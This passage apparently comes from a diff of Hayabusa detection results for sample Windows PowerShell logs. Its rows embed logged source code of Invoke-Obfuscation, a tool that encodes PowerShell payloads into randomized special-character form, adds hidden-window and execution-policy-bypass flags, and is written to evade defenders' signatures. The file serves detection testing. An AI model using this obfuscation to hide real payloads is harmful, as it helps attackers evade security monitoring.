-Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? \""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. $NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.279 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ 